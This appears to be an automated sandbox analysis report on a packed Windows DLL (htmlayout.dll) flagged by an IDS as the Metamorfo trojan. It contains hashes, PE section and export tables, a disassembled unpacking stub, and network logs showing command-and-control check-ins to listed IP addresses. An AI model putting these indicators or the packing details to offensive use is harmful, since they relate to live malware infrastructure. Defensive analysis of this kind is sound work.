          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.1.6.<./.P.i.d.>.......
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4729
          Entropy (8bit):4.441701455791416
          Encrypted:false
          SSDEEP:48:cvIwSD8zs/JgtWI9WYWgc8sqYjHb8fm8M4JCdsqFD+q8vjsT4SrSnd:uITfh5RgrsqYMJaKMDWnd
          MD5:3350E94084E8774E1519CCFE9F54F284
          SHA1:581DD5AA8299569F5F78FB6B4FF2287E9A9E6BE5
          SHA-256:49F224E98E392CAABE77671A2C697CFEE73A86DBED4AD13EBA8BEEB90A0B3A52
          SHA-512:592BBE46C2F6313984FC451B2F9D19F93B386F91BC65744707E643773EFA8CFFA1E7DA842887724FBE0B0A13D13719A313DE1964F952A005D2E470CCACB2EB23
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1809575" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
          Process:C:\Windows\SysWOW64\rundll32.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):75
          Entropy (8bit):4.1976360714607175
          Encrypted:false
          SSDEEP:3:oKXFQg0jZVGrDBgwf1jJRXFQg0jZVs:zrBPT
          MD5:040ECDF65C107F7C1D7EEF47E2F57478
          SHA1:8BAC019C51F125E9716FA1706A546E6C14A6E7D8
          SHA-256:E7CE8614F1DA20BBFAE87E08AB1429BC13CC4DCA25ED1DD3DA300646DC4AD5E7
          SHA-512:96544A0970B5A95879B1189EE52632C9F9D159C04127FD9F12BF46280D4C6384E546B4B81A3BB4F141BC8E68631F2574047D98795B404A5AFEB083D236B3FE25
          Malicious:false
          Preview:EC1533271D65E46F9BF90500..B5D770E651..[BACKUP0]..EC1533271D65E46F9BF90500..
          Process:C:\Windows\SysWOW64\rundll32.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):32
          Entropy (8bit):4.390319531114783
          Encrypted:false
          SSDEEP:3:1EypyqIPsy:1XpyRPh
          MD5:26D807B51D33180C20B728CB4D9E006F
          SHA1:3F2CE8BF16162D47DDE567C14830A2014395BD0C
          SHA-256:F6349BA34A6553A7B8D0433465A96C299599C966BE05F6A2E66B13E91A82F3FE
          SHA-512:F9932291C157B2996E890646626FEF2135CC10DFB05F552E1BF7A3A2759A090E23829B8A99E23632C7C0A50F9BCBB7A138E263D0D0AB74B5EE15C021C2A48679
          Malicious:false
          Preview:[Generate Pasta]..EjqOUSqiHMjI..
          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.968572135646623
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:htmlayout.dll
          File size:20644864
          MD5:dcdb484d09c7a99de645eb72c99ef4b7
          SHA1:2a52d8f4c2f3eb803b7b0431b9d505ed28e7c6f1
          SHA256:d35344f20096889139064c915d3b9b865b81bfa7af97167190c2ebfc7bdf3859
          SHA512:dab0e8d159d7d3752d0777b88bfd22fce2b86bcfbe4112a7faa968c58f6b9189723bb0ef06fcf6b498a10d5cf4410aecd5ec44c95dea01c1d601327056e73159
          SSDEEP:393216:U2BshnNGVR+FuzG2ni1lq2IsaClTYnrlcJ/QOKLap2Ber8XyRVUyfkyO8:U3hNGH+LBbbflQpc5QGpD8ww5
          TLSH:F02733631280BE56E122C2BAAC2256484C15F272CE057474F81F4EF5C09B66DDFBDBB9
          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
          Icon Hash:74f0e4ecccdce0e4
          Entrypoint:0x2f3f058
          Entrypoint Section:.boot
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
          DLL Characteristics:
          Time Stamp:0x63844C29 [Mon Nov 28 05:50:33 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:0
          File Version Major:5
          File Version Minor:0
          Subsystem Version Major:5
          Subsystem Version Minor:0
          Import Hash:efc5ba05a0955b6e73b95069770f4caa
          Instruction
          call 00007FE2A4E54370h
          push ebx
          mov ebx, esp
          push ebx
          mov esi, dword ptr [ebx+08h]
          mov edi, dword ptr [ebx+10h]
          cld
          mov dl, 80h
          mov al, byte ptr [esi]
          inc esi
          mov byte ptr [edi], al
          inc edi
          mov ebx, 00000002h
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          jnc 00007FE2A4E5420Ch
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          jnc 00007FE2A4E54273h
          xor eax, eax
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          jnc 00007FE2A4E54307h
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          adc eax, eax
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          adc eax, eax
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          adc eax, eax
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          adc eax, eax
          je 00007FE2A4E5422Ah
          push edi
          mov eax, eax
          sub edi, eax
          mov al, byte ptr [edi]
          pop edi
          mov byte ptr [edi], al
          inc edi
          mov ebx, 00000002h
          jmp 00007FE2A4E541BBh
          mov eax, 00000001h
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          adc eax, eax
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          jc 00007FE2A4E5420Ch
          sub eax, ebx
          mov ebx, 00000001h
          jne 00007FE2A4E5424Ah
          mov ecx, 00000001h
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          adc ecx, ecx
          add dl, dl
          jne 00007FE2A4E54227h
          mov dl, byte ptr [esi]
          inc esi
          adc dl, dl
          jc 00007FE2A4E5420Ch
          push esi
          mov esi, edi
          sub esi, ebp
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x14f70000x1a8a.edata
          IMAGE_DIRECTORY_ENTRY_IMPORT0x14f91a20x1a0.idata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x14fa0000x610.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4260000xac6
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          0x10000x3fd2f80x162800unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          0x3ff0000x29200x1600False0.9982244318181818data7.905526374226113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          0x4020000x179080xb200False0.9926044592696629data7.940066317077602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .bss0x41a0000x6f780x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          0x4210000x424e0x600False0.8951822916666666data7.04156579998244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          0x4260000xac60x400False1.0107421875data7.542388517876041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          0x4270000x1a8a0xa00False0.96484375data7.731488360073949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          0x4290000x440x200False0.849609375data6.443682514600191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          0x42a0000x588840x31200False0.9994483540076335data7.969033850722755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          0x4830000x10734000x358800unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .edata0x14f70000x1c000x1c00False0.30454799107142855data5.296088156361843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .idata0x14f90000x10000x400False0.4013671875data3.729841525615709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x14fa0000x10000x800False0.30859375data2.6783943012560316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .themida0x14fb0000x16440000x0unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .boot0x2b3f0000xeb36000xeb3600unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountry
          RT_STRING0x14fa0900x36cdata
          RT_VERSION0x14fa40c0x200Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States
          DLLImport
          kernel32.dllGetModuleHandleA
          oleaut32.dllSysFreeString
          advapi32.dllRegQueryValueExW
          user32.dllCharNextW
          gdi32.dllUnrealizeObject
          version.dllVerQueryValueW
          netapi32.dllNetApiBufferFree
          ole32.dllOleUninitialize
          shell32.dllShell_NotifyIconW
          msvcrt.dllsprintf
          comctl32.dllInitializeFlatSB
          winspool.drvOpenPrinterW
          wsock32.dllWSACleanup
          Magnification.dllMagSetImageScalingCallback
          NameOrdinalAddress
          HTMLayoutAnimateElement2090x7f238c
          HTMLayoutAppendMasterCSS2080x7f238c
          HTMLayoutAttachEventHandler2070x7f238c
          HTMLayoutAttachEventHandlerEx2060x7f238c
          HTMLayoutCallBehaviorMethod2050x7f238c
          HTMLayoutClassNameA2040x7f238c
          HTMLayoutClassNameW2030x7f238c
          HTMLayoutClearAttributes2020x7f238c
          HTMLayoutClipboardCopy2010x7f238c
          HTMLayoutCloneElement2000x7f238c
          HTMLayoutCombineURL1990x7f238c
          HTMLayoutCommitUpdates1980x7f238c
          HTMLayoutControlGetType1970x7f238c
          HTMLayoutControlGetValue1960x7f238c
          HTMLayoutControlSetValue1950x7f238c
          HTMLayoutCreateElement1940x7f238c
          HTMLayoutDataReady1930x7f238c
          HTMLayoutDataReadyAsync1920x7f238c
          HTMLayoutDeclareElementType1910x7f238c
          HTMLayoutDeleteElement1900x7f238c
          HTMLayoutDetachElement1890x7f238c
          HTMLayoutDetachEventHandler1880x7f238c
          HTMLayoutDialog1870x7f238c
          HTMLayoutElementGetExpando1860x7f238c
          HTMLayoutElementSetExpando1850x7f238c
          HTMLayoutEnqueueMeasure1840x7f238c
          HTMLayoutEnumElementStyles1830x7f238c
          HTMLayoutEnumResources1820x7f238c
          HTMLayoutEnumResourcesEx1810x7f238c
          HTMLayoutEnumerate1800x7f238c
          HTMLayoutFindElement1790x7f238c
          HTMLayoutGetAttributeByName1780x7f238c
          HTMLayoutGetAttributeCount1770x7f238c
          HTMLayoutGetCharacterRect1760x7f238c
          HTMLayoutGetChildrenCount1750x7f238c
          HTMLayoutGetElementByUID1740x7f238c
          HTMLayoutGetElementHtml1730x7f238c
          HTMLayoutGetElementHtmlCB1720x7f238c
          HTMLayoutGetElementHwnd1710x7f238c
          HTMLayoutGetElementIndex1700x7f238c
          HTMLayoutGetElementInnerText1690x7f238c
          HTMLayoutGetElementInnerText161680x7f238c
          HTMLayoutGetElementInnerTextCB1670x7f238c
          HTMLayoutGetElementIntrinsicHeight1660x7f238c
          HTMLayoutGetElementIntrinsicWidths1650x7f238c
          HTMLayoutGetElementLocation1640x7f238c
          HTMLayoutGetElementState1630x7f238c
          HTMLayoutGetElementText1620x7f238c
          HTMLayoutGetElementType1610x7f238c
          HTMLayoutGetElementUID1600x7f238c
          HTMLayoutGetFocusElement1590x7f238c
          HTMLayoutGetGraphin1580x7f238c
          HTMLayoutGetMinHeight1570x7f238c
          HTMLayoutGetMinWidth1560x7f238c
          HTMLayoutGetNthAttribute1550x7f238c
          HTMLayoutGetNthChild1540x7f238c
          HTMLayoutGetParentElement1530x7f238c
          HTMLayoutGetRootElement1520x7f238c
          HTMLayoutGetScrollInfo1510x7f238c
          HTMLayoutGetSelectedHTML1500x7f238c
          HTMLayoutGetStyleAttribute1490x7f238c
          HTMLayoutHidePopup1480x7f238c
          HTMLayoutHttpRequest1470x7f238c
          HTMLayoutInit1460x7f238c
          HTMLayoutInsertElement1450x7f238c
          HTMLayoutIsElementEnabled1440x7f238c
          HTMLayoutIsElementVisible1430x7f238c
          HTMLayoutLoadFile1420x7f238c
          HTMLayoutLoadHtml1410x7f238c
          HTMLayoutLoadHtmlEx1400x7f238c
          HTMLayoutMoveElement1390x7f238c
          HTMLayoutMoveElementEx1380x7f238c
          HTMLayoutParseValue1370x7f238c
          HTMLayoutPostEvent1360x7f238c
          HTMLayoutProc1350x7f238c
          HTMLayoutProcND1340x7f238c
          HTMLayoutProcW1330x7f238c
          HTMLayoutProcessUIEvent1320x7f238c
          HTMLayoutRangeAdvancePos1310x7f238c
          HTMLayoutRangeCreate1300x7f238c
          HTMLayoutRangeFromPositions1290x7f238c
          HTMLayoutRangeFromSelection1280x7f238c
          HTMLayoutRangeInsertHtml1270x7f238c
          HTMLayoutRangeIsEmpty1260x7f238c
          HTMLayoutRangeRelease1250x7f238c
          HTMLayoutRangeReplace1240x7f238c
          HTMLayoutRangeToHtml1230x7f238c
          HTMLayoutRender1220x7f238c
          HTMLayoutRenderElement1210x7f238c
          HTMLayoutRequestElementData1200x7f238c
          HTMLayoutScrollToView1190x7f238c
          HTMLayoutSelectElements1180x7f238c
          HTMLayoutSelectElementsW1170x7f238c
          HTMLayoutSelectParent1160x7f238c
          HTMLayoutSelectParentW1150x7f238c
          HTMLayoutSelectionExist1140x7f238c
          HTMLayoutSendEvent1130x7f238c
          HTMLayoutSetAttributeByName1120x7f238c
          HTMLayoutSetCSS1110x7f238c
          HTMLayoutSetCallback1100x7f238c
          HTMLayoutSetCapture1090x7f238c
          HTMLayoutSetDataLoader1080x7f238c
          HTMLayoutSetElementHtml1070x7f238c
          HTMLayoutSetElementInnerText1060x7f238c
          HTMLayoutSetElementInnerText161050x7f238c
          HTMLayoutSetElementState1040x7f238c
          HTMLayoutSetEventRoot1030x7f238c
          HTMLayoutSetHttpHeaders1020x7f238c
          HTMLayoutSetMasterCSS1010x7f238c
          HTMLayoutSetMediaType1000x7f238c
          HTMLayoutSetMode990x7f238c
          HTMLayoutSetOption980x7f238c
          HTMLayoutSetScrollPos970x7f238c
          HTMLayoutSetStyleAttribute960x7f238c
          HTMLayoutSetTimer950x7f238c
          HTMLayoutSetTimerEx940x7f238c
          HTMLayoutSetupDebugOutput930x7f238c
          HTMLayoutShowPopup920x7f238c
          HTMLayoutShowPopupAt910x7f238c
          HTMLayoutSortElements900x7f238c
          HTMLayoutSwapElements890x7f238c
          HTMLayoutTrackPopupAt880x7f238c
          HTMLayoutTranslateMessage870x7f238c
          HTMLayoutTraverseUIEvent860x7f238c
          HTMLayoutUpdateElement850x7f238c
          HTMLayoutUpdateElementEx840x7f238c
          HTMLayoutUpdateWindow830x7f238c
          HTMLayoutUrlEscape820x7f238c
          HTMLayoutUrlUnescape810x7f238c
          HTMLayoutVisitElements800x7f238c
          HTMLayoutWindowAttachEventHandler790x7f238c
          HTMLayoutWindowDetachEventHandler780x7f238c
          HTMLayout_UnuseElement770x7f238c
          HTMLayout_UseElement760x7f238c
          HTMLiteAdvanceFocus750x7f238c
          HTMLiteAttachEventHandler740x7f238c
          HTMLiteCreateInstance730x7f238c
          HTMLiteDestroyInstance720x7f238c
          HTMLiteDetachEventHandler710x7f238c
          HTMLiteFindElement700x7f238c
          HTMLiteGetDocumentMinHeight690x7f238c
          HTMLiteGetDocumentMinWidth680x7f238c
          HTMLiteGetElementByUID670x7f238c
          HTMLiteGetElementHTMLITE660x7f238c
          HTMLiteGetFocusElement650x7f238c
          HTMLiteGetNextFocusable640x7f238c
          HTMLiteGetRootElement630x7f238c
          HTMLiteGetTag620x7f238c
          HTMLiteLoadHtmlFromFile610x7f238c
          HTMLiteLoadHtmlFromMemory600x7f238c
          HTMLiteMeasure590x7f238c
          HTMLiteRender580x7f238c
          HTMLiteRenderEx570x7f238c
          HTMLiteRenderOnBitmap560x7f238c
          HTMLiteSetCallback550x7f238c
          HTMLiteSetDataReady540x7f238c
          HTMLiteSetDataReadyAsync530x7f238c
          HTMLiteSetMediaType520x7f238c
          HTMLiteSetTag510x7f238c
          HTMLiteTraverseUIEvent500x7f238c
          HTMLiteUpdateView490x7f238c
          HTMPrintCreateInstance480x7f238c
          HTMPrintDestroyInstance470x7f238c
          HTMPrintGetDocumentHeight460x7f238c
          HTMPrintGetDocumentMinWidth450x7f238c
          HTMPrintGetRootElement440x7f238c
          HTMPrintGetTag430x7f238c
          HTMPrintLoadHtmlFromFile420x7f238c
          HTMPrintLoadHtmlFromFileW410x7f238c
          HTMPrintLoadHtmlFromMemory400x7f238c
          HTMPrintMeasure390x7f238c
          HTMPrintRender380x7f238c
          HTMPrintSetCallback370x7f238c
          HTMPrintSetDataReady360x7f238c
          HTMPrintSetHyperlinkAreaCallback350x7f238c
          HTMPrintSetLoadDataCallback340x7f238c
          HTMPrintSetMediaType330x7f238c
          HTMPrintSetNextPageCallback320x7f238c
          HTMPrintSetTag310x7f238c
          TMethodImplementationIntercept30x469864
          ValueBinaryData300x7f238c
          ValueBinaryDataSet290x7f238c
          ValueClear280x7f238c
          ValueCompare270x7f238c
          ValueCopy260x7f238c
          ValueElementsCount250x7f238c
          ValueEnumElements240x7f238c
          ValueFloatData230x7f238c
          ValueFloatDataSet220x7f238c
          ValueFromString210x7f238c
          ValueGetValueOfKey200x7f238c
          ValueInit190x7f238c
          ValueInt64Data180x7f238c
          ValueInt64DataSet170x7f238c
          ValueIntData160x7f238c
          ValueIntDataSet150x7f238c
          ValueInvoke140x7f238c
          ValueIsolate130x7f238c
          ValueNthElementKey120x7f238c
          ValueNthElementValue110x7f238c
          ValueNthElementValueSet100x7f238c
          ValueSetValueToKey90x7f238c
          ValueStringData80x7f238c
          ValueStringDataSet70x7f238c
          ValueToString60x7f238c
          ValueType50x7f238c
          _HTMLayoutSetMediaVars@840x7f238c
          __dbk_fcall_wrapper20x411758
          dbkFCallWrapperAddr10x81d634
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.3141.8.197.4249705802833187 12/04/22-22:24:29.608439TCP2833187ETPRO TROJAN Win32/Metamorfo CnC Checkin4970580192.168.2.3141.8.197.42
          TimestampSource PortDest PortSource IPDest IP
          Dec 4, 2022 22:24:29.558840036 CET4970580192.168.2.3141.8.197.42
          Dec 4, 2022 22:24:29.607657909 CET8049705141.8.197.42192.168.2.3
          Dec 4, 2022 22:24:29.607819080 CET4970580192.168.2.3141.8.197.42
          Dec 4, 2022 22:24:29.608438969 CET4970580192.168.2.3141.8.197.42
          Dec 4, 2022 22:24:29.657253981 CET8049705141.8.197.42192.168.2.3
          Dec 4, 2022 22:24:29.657469034 CET4970580192.168.2.3141.8.197.42
          Dec 4, 2022 22:24:29.706732988 CET8049705141.8.197.42192.168.2.3
          Dec 4, 2022 22:24:29.707089901 CET8049705141.8.197.42192.168.2.3
          Dec 4, 2022 22:24:29.707148075 CET8049705141.8.197.42192.168.2.3
          Dec 4, 2022 22:24:29.708671093 CET4970580192.168.2.3141.8.197.42
          Dec 4, 2022 22:24:29.708725929 CET4970580192.168.2.3141.8.197.42
          Dec 4, 2022 22:24:29.761914015 CET8049705141.8.197.42192.168.2.3
          Dec 4, 2022 22:24:30.540967941 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.541055918 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:30.541182041 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.568197966 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.568252087 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:30.632766008 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:30.633042097 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.636622906 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.636662006 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:30.637084961 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:30.720875025 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.978382111 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.978446007 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:30.978553057 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.984556913 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:30.984612942 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:31.039632082 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:31.039729118 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:31.043879032 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:31.043900967 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:31.044317961 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:31.220869064 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:31.417792082 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:31.417848110 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:31.956968069 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:31.957032919 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.247209072 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.247493029 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.247822046 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:32.268958092 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:32.269030094 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.269063950 CET49706443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:32.269081116 CET44349706172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.439500093 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.439764977 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.440769911 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:32.440989971 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:32.441025972 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.441056013 CET49707443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:32.441076040 CET44349707172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:32.856518984 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:32.959736109 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:24:32.959917068 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:33.209419012 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:33.312201023 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:24:33.317472935 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:34.810281038 CET49710443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:34.810384989 CET44349710172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:34.810496092 CET49710443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:34.826961994 CET49710443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:34.827008963 CET44349710172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:34.872123003 CET44349710172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:34.872205019 CET49710443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:34.876988888 CET49710443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:34.877023935 CET44349710172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:34.877511024 CET44349710172.67.34.170192.168.2.3
          Dec 4, 2022 22:24:35.012207031 CET49710443192.168.2.3172.67.34.170
          Dec 4, 2022 22:24:35.961409092 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:36.069016933 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:24:36.070651054 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:36.214833021 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:24:36.228599072 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:24:36.312284946 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:36.320386887 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:36.432481050 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:24:36.444801092 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:36.588478088 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:24:36.635149002 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:24:36.636060953 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:24:36.779478073 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:24:36.893256903 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:24:37.006364107 CET497092000192.168.2.386.48.24.91
